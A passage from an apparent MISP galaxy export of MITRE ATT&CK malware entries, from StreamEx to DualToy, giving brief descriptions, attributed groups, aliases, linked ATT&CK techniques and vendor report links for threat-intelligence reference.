[StreamEx](https://attack.mitre.org/software/S0142) is a malware family that has been used by [Deep Panda](https://attack.mitre.org/groups/G0009) since at least 2015. In 2016, it was distributed via legitimate compromised Korean websites. (Citation: Cylance Shell Crew Feb 2017)

The tag is: misp-galaxy:mitre-malware="StreamEx - S0142"

StreamEx - S0142 is also known as:

  • StreamEx

StreamEx - S0142 has relationships with:

  • similar: misp-galaxy:tool="StreamEx" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="New Service - T1050" with estimative-language:likelihood-probability="almost-certain"

Table 7435. Table References

Links

https://attack.mitre.org/software/S0142

https://www.cylance.com/shell-crew-variants-continue-to-fly-under-big-avs-radar

GolfSpy - S0421

[GolfSpy](https://attack.mitre.org/software/S0421) is Android spyware deployed by the group [Bouncing Golf](https://attack.mitre.org/groups/G0097).(Citation: Trend Micro Bouncing Golf 2019)

The tag is: misp-galaxy:mitre-malware="GolfSpy - S0421"

GolfSpy - S0421 is also known as:

  • GolfSpy

Table 7436. Table References

Links

https://attack.mitre.org/software/S0421

https://blog.trendmicro.com/trendlabs-security-intelligence/mobile-cyberespionage-campaign-bouncing-golf-affects-middle-east/

Pisloader - S0124

[Pisloader](https://attack.mitre.org/software/S0124) is a malware family that is notable due to its use of DNS as a C2 protocol as well as its use of anti-analysis tactics. It has been used by [APT18](https://attack.mitre.org/groups/G0026) and is similar to another malware family, [HTTPBrowser](https://attack.mitre.org/software/S0070), that has been used by the group. (Citation: Palo Alto DNS Requests)

The tag is: misp-galaxy:mitre-malware="Pisloader - S0124"

Pisloader - S0124 is also known as:

  • Pisloader

Pisloader - S0124 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

Table 7437. Table References

Links

http://researchcenter.paloaltonetworks.com/2016/05/unit42-new-wekby-attacks-use-dns-requests-as-command-and-control-mechanism/

https://attack.mitre.org/software/S0124

ZxShell - S0412

[ZxShell](https://attack.mitre.org/software/S0412) is a remote administration tool and backdoor that can be downloaded from the Internet, particularly from Chinese hacker websites. It has been used since at least 2004.(Citation: FireEye APT41 Aug 2019)(Citation: Talos ZxShell Oct 2014)

The tag is: misp-galaxy:mitre-malware="ZxShell - S0412"

ZxShell - S0412 is also known as:

  • ZxShell

  • Sensocode

Table 7438. Table References

Links

https://attack.mitre.org/software/S0412

https://blogs.cisco.com/security/talos/opening-zxshell

https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf

KARAE - S0215

[KARAE](https://attack.mitre.org/software/S0215) is a backdoor typically used by [APT37](https://attack.mitre.org/groups/G0067) as first-stage malware. (Citation: FireEye APT37 Feb 2018)

The tag is: misp-galaxy:mitre-malware="KARAE - S0215"

KARAE - S0215 is also known as:

  • KARAE

KARAE - S0215 has relationships with:

  • similar: misp-galaxy:tool="KARAE" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

Table 7439. Table References

Links

https://attack.mitre.org/software/S0215

https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf

DEADEYE - S1052

[DEADEYE](https://attack.mitre.org/software/S1052) is a malware launcher that has been used by [APT41](https://attack.mitre.org/groups/G0096) since at least May 2021. [DEADEYE](https://attack.mitre.org/software/S1052) has variants that can either embed a payload inside a compiled binary (DEADEYE.EMBED) or append it to the end of a file (DEADEYE.APPEND).(Citation: Mandiant APT41)

The tag is: misp-galaxy:mitre-malware="DEADEYE - S1052"

DEADEYE - S1052 is also known as:

  • DEADEYE

  • DEADEYE.EMBED

  • DEADEYE.APPEND

Table 7440. Table References

Links

https://attack.mitre.org/software/S1052

https://www.mandiant.com/resources/apt41-us-state-governments

Amadey - S1025

[Amadey](https://attack.mitre.org/software/S1025) is a Trojan bot that has been used since at least October 2018.(Citation: Korean FSI TA505 2020)(Citation: BlackBerry Amadey 2020)

The tag is: misp-galaxy:mitre-malware="Amadey - S1025"

Amadey - S1025 is also known as:

  • Amadey

Table 7441. Table References

Links

https://attack.mitre.org/software/S1025

https://blogs.blackberry.com/en/2020/01/threat-spotlight-amadey-bot

https://www.fsec.or.kr/user/bbs/fsec/163/344/bbsDataView/1382.do?page=1&column=&search=&searchSDate=&searchEDate=&bbsDataCategory=

FatDuke - S0512

[FatDuke](https://attack.mitre.org/software/S0512) is a backdoor used by [APT29](https://attack.mitre.org/groups/G0016) since at least 2016.(Citation: ESET Dukes October 2019)

The tag is: misp-galaxy:mitre-malware="FatDuke - S0512"

FatDuke - S0512 is also known as:

  • FatDuke

Table 7442. Table References

Links

https://attack.mitre.org/software/S0512

https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Operation_Ghost_Dukes.pdf

EvilGrab - S0152

[EvilGrab](https://attack.mitre.org/software/S0152) is a malware family with common reconnaissance capabilities. It has been deployed by [menuPass](https://attack.mitre.org/groups/G0045) via malicious Microsoft Office documents as part of spearphishing campaigns. (Citation: PWC Cloud Hopper Technical Annex April 2017)

The tag is: misp-galaxy:mitre-malware="EvilGrab - S0152"

EvilGrab - S0152 is also known as:

  • EvilGrab

EvilGrab - S0152 has relationships with:

  • similar: misp-galaxy:malpedia="EvilGrab" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:tool="EvilGrab" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Commonly Used Port - T1043" with estimative-language:likelihood-probability="almost-certain"

Table 7443. Table References

Links

https://attack.mitre.org/software/S0152

https://www.pwc.co.uk/cyber-security/pdf/pwc-uk-operation-cloud-hopper-technical-annex-april-2017.pdf

Remsec - S0125

[Remsec](https://attack.mitre.org/software/S0125) is a modular backdoor that has been used by [Strider](https://attack.mitre.org/groups/G0041) and appears to have been designed primarily for espionage purposes. Many of its modules are written in Lua. (Citation: Symantec Strider Blog)

The tag is: misp-galaxy:mitre-malware="Remsec - S0125"

Remsec - S0125 is also known as:

  • Remsec

  • Backdoor.Remsec

  • ProjectSauron

Remsec - S0125 has relationships with:

  • similar: misp-galaxy:malpedia="Remsec" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Exfiltration Over Alternative Protocol - T1048" with estimative-language:likelihood-probability="almost-certain"

Table 7444. Table References

Links

http://www.symantec.com/connect/blogs/strider-cyberespionage-group-turns-eye-sauron-targets

https://attack.mitre.org/software/S0125

https://securelist.com/faq-the-projectsauron-apt/75533/

Zebrocy - S0251

[Zebrocy](https://attack.mitre.org/software/S0251) is a Trojan that has been used by [APT28](https://attack.mitre.org/groups/G0007) since at least November 2015. The malware comes in several programming language variants, including C++, Delphi, AutoIt, C#, VB.NET, and Golang. (Citation: Palo Alto Sofacy 06-2018)(Citation: Unit42 Cannon Nov 2018)(Citation: Unit42 Sofacy Dec 2018)(Citation: CISA Zebrocy Oct 2020)

The tag is: misp-galaxy:mitre-malware="Zebrocy - S0251"

Zebrocy - S0251 is also known as:

  • Zebrocy

  • Zekapab

Table 7445. Table References

Links

https://attack.mitre.org/software/S0251

https://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/

https://researchcenter.paloaltonetworks.com/2018/11/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/

https://unit42.paloaltonetworks.com/dear-joohn-sofacy-groups-global-campaign/

https://us-cert.cisa.gov/ncas/analysis-reports/ar20-303b

https://www.accenture.com/t20181129T203820Zw/us-en/_acnmedia/PDF-90/Accenture-snakemackerel-delivers-zekapab-malware.pdf#zoom=50

https://www.cyberscoop.com/apt28-brexit-phishing-accenture/

ComRAT - S0126

[ComRAT](https://attack.mitre.org/software/S0126) is a second stage implant suspected of being a descendant of [Agent.btz](https://attack.mitre.org/software/S0092) and used by [Turla](https://attack.mitre.org/groups/G0010). The first version of [ComRAT](https://attack.mitre.org/software/S0126) was identified in 2007, but the tool has undergone substantial development for many years since.(Citation: Symantec Waterbug)(Citation: NorthSec 2015 GData Uroburos Tools)(Citation: ESET ComRAT May 2020)

The tag is: misp-galaxy:mitre-malware="ComRAT - S0126"

ComRAT - S0126 is also known as:

  • ComRAT

ComRAT - S0126 has relationships with:

  • similar: misp-galaxy:rat="ComRAT" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Agent.BTZ" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:tool="Agent.BTZ" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Application Layer Protocol - T1071" with estimative-language:likelihood-probability="almost-certain"

Table 7446. Table References

Links

https://attack.mitre.org/software/S0126

https://docplayer.net/101655589-Tools-used-by-the-uroburos-actors.html

https://www.threatminer.org/report.php?q=waterbug-attack-group.pdf&y=2015#gsc.tab=0&gsc.q=waterbug-attack-group.pdf&gsc.page=1

https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf

POORAIM - S0216

[POORAIM](https://attack.mitre.org/software/S0216) is a backdoor used by [APT37](https://attack.mitre.org/groups/G0067) in campaigns since at least 2014. (Citation: FireEye APT37 Feb 2018)

The tag is: misp-galaxy:mitre-malware="POORAIM - S0216"

POORAIM - S0216 is also known as:

  • POORAIM

POORAIM - S0216 has relationships with:

  • similar: misp-galaxy:tool="POORAIM" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"

Table 7447. Table References

Links

https://attack.mitre.org/software/S0216

https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf

Catchamas - S0261

[Catchamas](https://attack.mitre.org/software/S0261) is a Windows Trojan that steals information from compromised systems. (Citation: Symantec Catchamas April 2018)

The tag is: misp-galaxy:mitre-malware="Catchamas - S0261"

Catchamas - S0261 is also known as:

  • Catchamas

Table 7448. Table References

Links

https://attack.mitre.org/software/S0261

https://www-west.symantec.com/content/symantec/english/en/security-center/writeup.html/2018-040209-1742-99

Komplex - S0162

[Komplex](https://attack.mitre.org/software/S0162) is a backdoor that has been used by [APT28](https://attack.mitre.org/groups/G0007) on OS X and appears to be developed in a similar manner to [XAgentOSX](https://attack.mitre.org/software/S0161) (Citation: XAgentOSX 2017) (Citation: Sofacy Komplex Trojan).

The tag is: misp-galaxy:mitre-malware="Komplex - S0162"

Komplex - S0162 is also known as:

  • Komplex

Komplex - S0162 has relationships with:

  • similar: misp-galaxy:tool="SOURFACE" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:tool="CORESHELL" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:tool="GAMEFISH" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Komplex" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Application Layer Protocol - T1071" with estimative-language:likelihood-probability="almost-certain"

Table 7449. Table References

Links

https://attack.mitre.org/software/S0162

https://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/

https://researchcenter.paloaltonetworks.com/2017/02/unit42-xagentosx-sofacys-xagent-macos-tool/

WastedLocker - S0612

[WastedLocker](https://attack.mitre.org/software/S0612) is a ransomware family attributed to [Indrik Spider](https://attack.mitre.org/groups/G0119) that has been used since at least May 2020. [WastedLocker](https://attack.mitre.org/software/S0612) has been used against a broad variety of sectors, including manufacturing, information technology, and media.(Citation: Symantec WastedLocker June 2020)(Citation: NCC Group WastedLocker June 2020)(Citation: Sentinel Labs WastedLocker July 2020)

The tag is: misp-galaxy:mitre-malware="WastedLocker - S0612"

WastedLocker - S0612 is also known as:

  • WastedLocker

Table 7450. Table References

Links

https://attack.mitre.org/software/S0612

https://research.nccgroup.com/2020/06/23/wastedlocker-a-new-ransomware-variant-developed-by-the-evil-corp-group/

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/wastedlocker-ransomware-us

https://www.sentinelone.com/labs/wastedlocker-ransomware-abusing-ads-and-ntfs-file-attributes/

Mongall - S1026

[Mongall](https://attack.mitre.org/software/S1026) is a backdoor that has been used since at least 2013, including by [Aoqin Dragon](https://attack.mitre.org/groups/G1007).(Citation: SentinelOne Aoqin Dragon June 2022)

The tag is: misp-galaxy:mitre-malware="Mongall - S1026"

Mongall - S1026 is also known as:

  • Mongall

Table 7451. Table References

Links

https://attack.mitre.org/software/S1026

https://www.sentinelone.com/labs/aoqin-dragon-newly-discovered-chinese-linked-apt-has-been-quietly-spying-on-organizations-for-10-years/

BBSRAT - S0127

[BBSRAT](https://attack.mitre.org/software/S0127) is malware with remote access tool functionality that has been used in targeted compromises. (Citation: Palo Alto Networks BBSRAT)

The tag is: misp-galaxy:mitre-malware="BBSRAT - S0127"

BBSRAT - S0127 is also known as:

  • BBSRAT

BBSRAT - S0127 has relationships with:

  • similar: misp-galaxy:malpedia="BBSRAT" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="System Service Discovery - T1007" with estimative-language:likelihood-probability="almost-certain"

Table 7452. Table References

Links

http://researchcenter.paloaltonetworks.com/2015/12/bbsrat-attacks-targeting-russian-organizations-linked-to-roaming-tiger/

https://attack.mitre.org/software/S0127

KEYMARBLE - S0271

[KEYMARBLE](https://attack.mitre.org/software/S0271) is a Trojan that has reportedly been used by the North Korean government. (Citation: US-CERT KEYMARBLE Aug 2018)

The tag is: misp-galaxy:mitre-malware="KEYMARBLE - S0271"

KEYMARBLE - S0271 is also known as:

  • KEYMARBLE

Table 7453. Table References

Links

https://attack.mitre.org/software/S0271

https://www.us-cert.gov/ncas/analysis-reports/AR18-221A

SHUTTERSPEED - S0217

[SHUTTERSPEED](https://attack.mitre.org/software/S0217) is a backdoor used by [APT37](https://attack.mitre.org/groups/G0067). (Citation: FireEye APT37 Feb 2018)

The tag is: misp-galaxy:mitre-malware="SHUTTERSPEED - S0217"

SHUTTERSPEED - S0217 has relationships with:

  • similar: misp-galaxy:tool="SHUTTERSPEED" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"

Table 7454. Table References

Links

https://attack.mitre.org/software/S0217

https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf

Reaver - S0172

[Reaver](https://attack.mitre.org/software/S0172) is a malware family that has been in the wild since at least late 2016. Reporting indicates victims have primarily been associated with the "Five Poisons," which are movements the Chinese government considers dangerous. The type of malware is rare due to its final payload being in the form of [Control Panel](https://attack.mitre.org/techniques/T1218/002) items.(Citation: Palo Alto Reaver Nov 2017)

The tag is: misp-galaxy:mitre-malware="Reaver - S0172"

Reaver - S0172 is also known as:

  • Reaver

Reaver - S0172 has relationships with:

  • similar: misp-galaxy:malpedia="Reaver" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1060" with estimative-language:likelihood-probability="almost-certain"

Table 7455. Table References

Links

https://attack.mitre.org/software/S0172

https://researchcenter.paloaltonetworks.com/2017/11/unit42-new-malware-with-ties-to-sunorcal-discovered/

BADNEWS - S0128

[BADNEWS](https://attack.mitre.org/software/S0128) is malware that has been used by the actors responsible for the [Patchwork](https://attack.mitre.org/groups/G0040) campaign. Its name was given due to its use of RSS feeds, forums, and blogs for command and control. (Citation: Forcepoint Monsoon) (Citation: TrendMicro Patchwork Dec 2017)

The tag is: misp-galaxy:mitre-malware="BADNEWS - S0128"

BADNEWS - S0128 is also known as:

  • BADNEWS

BADNEWS - S0128 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Input Capture - T1056" with estimative-language:likelihood-probability="almost-certain"

Table 7456. Table References

Links

https://attack.mitre.org/software/S0128

https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf

https://www.forcepoint.com/sites/default/files/resources/files/forcepoint-security-labs-monsoon-analysis-report.pdf

SLOWDRIFT - S0218

[SLOWDRIFT](https://attack.mitre.org/software/S0218) is a backdoor used by [APT37](https://attack.mitre.org/groups/G0067) against academic and strategic victims in South Korea. (Citation: FireEye APT37 Feb 2018)

The tag is: misp-galaxy:mitre-malware="SLOWDRIFT - S0218"

SLOWDRIFT - S0218 is also known as:

  • SLOWDRIFT

SLOWDRIFT - S0218 has relationships with:

  • similar: misp-galaxy:tool="SLOWDRIFT" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

Table 7457. Table References

Links

https://attack.mitre.org/software/S0218

https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf

Dok - S0281

[Dok](https://attack.mitre.org/software/S0281) is a Trojan application disguised as a .zip file that is able to collect user credentials and install a malicious proxy server to redirect a user’s network traffic (i.e. [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557)).(Citation: objsee mac malware 2017)(Citation: hexed osx.dok analysis 2019)(Citation: CheckPoint Dok)

The tag is: misp-galaxy:mitre-malware="Dok - S0281"

Dok - S0281 is also known as:

  • Dok

  • Retefe

Table 7458. Table References

Links

http://www.hexed.in/2019/07/osxdok-analysis.html

https://attack.mitre.org/software/S0281

https://blog.checkpoint.com/2017/04/27/osx-malware-catching-wants-read-https-traffic/

https://objective-see.com/blog/blog_0x25.html

FinFisher - S0182

[FinFisher](https://attack.mitre.org/software/S0182) is a government-grade commercial surveillance spyware reportedly sold exclusively to government agencies for use in targeted and lawful criminal investigations. It is heavily obfuscated and uses multiple anti-analysis techniques. It has other variants including [Wingbird](https://attack.mitre.org/software/S0176). (Citation: FinFisher Citation) (Citation: Microsoft SIR Vol 21) (Citation: FireEye FinSpy Sept 2017) (Citation: Securelist BlackOasis Oct 2017) (Citation: Microsoft FinFisher March 2018)

The tag is: misp-galaxy:mitre-malware="FinFisher - S0182"

FinFisher - S0182 is also known as:

  • FinFisher

  • FinSpy

FinFisher - S0182 has relationships with:

  • similar: misp-galaxy:malpedia="FinFisher RAT" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="DLL Search Order Hijacking - T1038" with estimative-language:likelihood-probability="almost-certain"

Table 7459. Table References

Links

http://download.microsoft.com/download/E/B/0/EB0F50CC-989C-4B66-B7F6-68CD3DC90DE3/Microsoft_Security_Intelligence_Report_Volume_21_English.pdf

http://www.finfisher.com/FinFisher/index.html

https://attack.mitre.org/software/S0182

https://cloudblogs.microsoft.com/microsoftsecure/2018/03/01/finfisher-exposed-a-researchers-tale-of-defeating-traps-tricks-and-complex-virtual-machines/

https://securelist.com/blackoasis-apt-and-new-targeted-attacks-leveraging-zero-day-exploit/82732/

https://www.fireeye.com/blog/threat-research/2017/09/zero-day-used-to-distribute-finspy.html

Sunbird - S1082

[Sunbird](https://attack.mitre.org/software/S1082) is one of two mobile malware families known to be used by the APT [Confucius](https://attack.mitre.org/groups/G0142). Analysis suggests that [Sunbird](https://attack.mitre.org/software/S1082) was first active in early 2017. While [Sunbird](https://attack.mitre.org/software/S1082) and [Hornbill](https://attack.mitre.org/software/S1077) overlap in core capabilities, [Sunbird](https://attack.mitre.org/software/S1082) has a more extensive set of malicious features.(Citation: lookout_hornbill_sunbird_0221)

The tag is: misp-galaxy:mitre-malware="Sunbird - S1082"

Sunbird - S1082 is also known as:

  • Sunbird

Table 7460. Table References

Links

https://attack.mitre.org/software/S1082

https://www.lookout.com/blog/lookout-discovers-novel-confucius-apt-android-spyware-linked-to-india-pakistan-conflict

WINERACK - S0219

[WINERACK](https://attack.mitre.org/software/S0219) is a backdoor used by [APT37](https://attack.mitre.org/groups/G0067). (Citation: FireEye APT37 Feb 2018)

The tag is: misp-galaxy:mitre-malware="WINERACK - S0219"

WINERACK - S0219 has relationships with:

  • similar: misp-galaxy:tool="WINERACK" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Application Window Discovery - T1010" with estimative-language:likelihood-probability="almost-certain"

Table 7461. Table References

Links

https://attack.mitre.org/software/S0219

https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf

PJApps - S0291

[PJApps](https://attack.mitre.org/software/S0291) is an Android malware family. (Citation: Lookout-EnterpriseApps)

The tag is: misp-galaxy:mitre-malware="PJApps - S0291"

PJApps - S0291 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1422" with estimative-language:likelihood-probability="almost-certain"

  • uses: misp-galaxy:mitre-attack-pattern="Carrier Billing Fraud - T1448" with estimative-language:likelihood-probability="almost-certain"

Table 7462. Table References

Links

https://attack.mitre.org/software/S0291

https://blog.lookout.com/blog/2016/05/25/spoofed-apps/

Escobar - S1092

[Escobar](https://attack.mitre.org/software/S1092) is an Android banking trojan, first detected in March 2021, believed to be a new variant of AbereBot.(Citation: Bleeipng Computer Escobar)

The tag is: misp-galaxy:mitre-malware="Escobar - S1092"

Escobar - S1092 is also known as:

  • Escobar

Table 7463. Table References

Links

https://attack.mitre.org/software/S1092

https://www.bleepingcomputer.com/news/security/android-malware-escobar-steals-your-google-authenticator-mfa-codes/

DCSrv - S1033

[DCSrv](https://attack.mitre.org/software/S1033) is destructive malware that has been used by [Moses Staff](https://attack.mitre.org/groups/G1009) since at least September 2021. Though [DCSrv](https://attack.mitre.org/software/S1033) has ransomware-like capabilities, [Moses Staff](https://attack.mitre.org/groups/G1009) does not demand ransom or offer a decryption key.(Citation: Checkpoint MosesStaff Nov 2021)

The tag is: misp-galaxy:mitre-malware="DCSrv - S1033"

DCSrv - S1033 is also known as:

  • DCSrv

Table 7464. Table References

Links

https://attack.mitre.org/software/S1033

https://research.checkpoint.com/2021/mosesstaff-targeting-israeli-companies/

RuMMS - S0313

[RuMMS](https://attack.mitre.org/software/S0313) is an Android malware family. (Citation: FireEye-RuMMS)

The tag is: misp-galaxy:mitre-malware="RuMMS - S0313"

RuMMS - S0313 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1422" with estimative-language:likelihood-probability="almost-certain"

Table 7465. Table References

Links

https://attack.mitre.org/software/S0313

https://www.fireeye.com/blog/threat-research/2016/04/rumms-android-malware.html

HotCroissant - S0431

[HotCroissant](https://attack.mitre.org/software/S0431) is a remote access trojan (RAT) attributed by U.S. government entities to malicious North Korean government cyber activity, tracked collectively as HIDDEN COBRA.(Citation: US-CERT HOTCROISSANT February 2020) [HotCroissant](https://attack.mitre.org/software/S0431) shares numerous code similarities with [Rifdoor](https://attack.mitre.org/software/S0433).(Citation: Carbon Black HotCroissant April 2020)

The tag is: misp-galaxy:mitre-malware="HotCroissant - S0431"

HotCroissant - S0431 is also known as:

  • HotCroissant

Table 7466. Table References

Links

https://attack.mitre.org/software/S0431

https://www.carbonblack.com/2020/04/16/vmware-carbon-black-tau-threat-analysis-the-evolution-of-lazarus/

https://www.us-cert.gov/ncas/analysis-reports/ar20-045d

Downdelph - S0134

[Downdelph](https://attack.mitre.org/software/S0134) is a first-stage downloader written in Delphi that has been used by [APT28](https://attack.mitre.org/groups/G0007) in rare instances between 2013 and 2015. (Citation: ESET Sednit Part 3)

The tag is: misp-galaxy:mitre-malware="Downdelph - S0134"

Downdelph - S0134 is also known as:

  • Downdelph

  • Delphacy

Downdelph - S0134 has relationships with:

  • similar: misp-galaxy:tool="Downdelph" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Downdelph" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

Table 7467. Table References

Links

http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part3.pdf

https://attack.mitre.org/software/S0134

Flame - S0143

[Flame](https://attack.mitre.org/software/S0143) is a sophisticated toolkit that has been used to collect information since at least 2010, largely targeting Middle East countries. (Citation: Kaspersky Flame)

The tag is: misp-galaxy:mitre-malware="Flame - S0143"

Flame - S0143 is also known as:

  • Flame

  • Flamer

  • sKyWIper

Flame - S0143 has relationships with:

  • similar: misp-galaxy:tool="Flame" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Audio Capture - T1123" with estimative-language:likelihood-probability="almost-certain"

Table 7468. Table References

Links

https://attack.mitre.org/software/S0143

https://securelist.com/the-flame-questions-and-answers-51/34344/

https://www.crysys.hu/publications/files/skywiper.pdf

https://www.symantec.com/connect/blogs/flamer-recipe-bluetoothache

StrifeWater - S1034

[StrifeWater](https://attack.mitre.org/software/S1034) is a remote-access tool that has been used by [Moses Staff](https://attack.mitre.org/groups/G1009) in the initial stages of their attacks since at least November 2021.(Citation: Cybereason StrifeWater Feb 2022)

The tag is: misp-galaxy:mitre-malware="StrifeWater - S1034"

StrifeWater - S1034 is also known as:

  • StrifeWater

Table 7469. Table References

Links

https://attack.mitre.org/software/S1034

https://www.cybereason.com/blog/research/strifewater-rat-iranian-apt-moses-staff-adds-new-trojan-to-ransomware-operations

Xbash - S0341

[Xbash](https://attack.mitre.org/software/S0341) is a malware family that has targeted Linux and Microsoft Windows servers. The malware has been tied to the Iron Group, a threat actor group known for previous ransomware attacks. [Xbash](https://attack.mitre.org/software/S0341) was developed in Python and then converted into a self-contained Linux ELF executable by using PyInstaller.(Citation: Unit42 Xbash Sept 2018)

The tag is: misp-galaxy:mitre-malware="Xbash - S0341"

Xbash - S0341 is also known as:

  • Xbash

Table 7470. Table References

Links

https://attack.mitre.org/software/S0341

https://researchcenter.paloaltonetworks.com/2018/09/unit42-xbash-combines-botnet-ransomware-coinmining-worm-targets-linux-windows/

Final1stspy - S0355

[Final1stspy](https://attack.mitre.org/software/S0355) is a dropper family that has been used to deliver [DOGCALL](https://attack.mitre.org/software/S0213).(Citation: Unit 42 Nokki Oct 2018)

The tag is: misp-galaxy:mitre-malware="Final1stspy - S0355"

Final1stspy - S0355 is also known as:

  • Final1stspy

Table 7471. Table References

Links

https://attack.mitre.org/software/S0355

https://researchcenter.paloaltonetworks.com/2018/10/unit42-nokki-almost-ties-the-knot-with-dogcall-reaper-group-uses-new-malware-to-deploy-rat/

AvosLocker - S1053

[AvosLocker](https://attack.mitre.org/software/S1053) is ransomware written in C++ that has been offered via the Ransomware-as-a-Service (RaaS) model. It was first observed in June 2021 and has been used against financial services, critical manufacturing, government facilities, and other critical infrastructure sectors in the United States. As of March 2022, [AvosLocker](https://attack.mitre.org/software/S1053) had also been used against organizations in Belgium, Canada, China, Germany, Saudi Arabia, Spain, Syria, Taiwan, Turkey, the United Arab Emirates, and the United Kingdom.(Citation: Malwarebytes AvosLocker Jul 2021)(Citation: Trend Micro AvosLocker Apr 2022)(Citation: Joint CSA AvosLocker Mar 2022)

The tag is: misp-galaxy:mitre-malware="AvosLocker - S1053"

AvosLocker - S1053 is also known as:

  • AvosLocker

Table 7472. Table References

Links

https://attack.mitre.org/software/S1053

https://www.ic3.gov/Media/News/2022/220318.pdf

https://www.malwarebytes.com/blog/threat-intelligence/2021/07/avoslocker-enters-the-ransomware-scene-asks-for-partners

https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-avoslocker

Cannon - S0351

[Cannon](https://attack.mitre.org/software/S0351) is a Trojan with variants written in C# and Delphi. It was first observed in April 2018. (Citation: Unit42 Cannon Nov 2018)(Citation: Unit42 Sofacy Dec 2018)

The tag is: misp-galaxy:mitre-malware="Cannon - S0351"

Cannon - S0351 is also known as:

  • Cannon

Table 7473. Table References

Links

https://attack.mitre.org/software/S0351

https://researchcenter.paloaltonetworks.com/2018/11/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/

https://unit42.paloaltonetworks.com/dear-joohn-sofacy-groups-global-campaign/

HIDEDRV - S0135

[HIDEDRV](https://attack.mitre.org/software/S0135) is a rootkit used by [APT28](https://attack.mitre.org/groups/G0007). It has been deployed along with [Downdelph](https://attack.mitre.org/software/S0134) to execute and hide that malware. (Citation: ESET Sednit Part 3) (Citation: Sekoia HideDRV Oct 2016)

The tag is: misp-galaxy:mitre-malware="HIDEDRV - S0135"

HIDEDRV - S0135 is also known as:

  • HIDEDRV

HIDEDRV - S0135 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Rootkit - T1014" with estimative-language:likelihood-probability="almost-certain"

Table 7474. Table References

Links

http://www.sekoia.fr/blog/wp-content/uploads/2016/10/Rootkit-analysis-Use-case-on-HIDEDRV-v1.6.pdf

http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part3.pdf

https://attack.mitre.org/software/S0135

LiteDuke - S0513

[LiteDuke](https://attack.mitre.org/software/S0513) is a third stage backdoor that was used by [APT29](https://attack.mitre.org/groups/G0016), primarily in 2014-2015. [LiteDuke](https://attack.mitre.org/software/S0513) used the same dropper as [PolyglotDuke](https://attack.mitre.org/software/S0518), and was found on machines also compromised by [MiniDuke](https://attack.mitre.org/software/S0051).(Citation: ESET Dukes October 2019)

The tag is: misp-galaxy:mitre-malware="LiteDuke - S0513"

LiteDuke - S0513 is also known as:

  • LiteDuke

Table 7475. Table References

Links

https://attack.mitre.org/software/S0513

https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Operation_Ghost_Dukes.pdf

DualToy - S0315

[DualToy](https://attack.mitre.org/software/S0315) is Windows malware that installs malicious applications onto Android and iOS devices connected over USB. (Citation: PaloAlto-DualToy)

The tag is: misp-galaxy:mitre-malware="DualToy - S0315"

DualToy - S0315 has relationships with:

  • similar: misp-galaxy:malpedia="DualToy (Android)" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Replication Through Removable Media - T1458" with estimative-language:likelihood-probability="almost-certain"

Table 7476. Table References

Links

https://attack.mitre.org/software/S0315

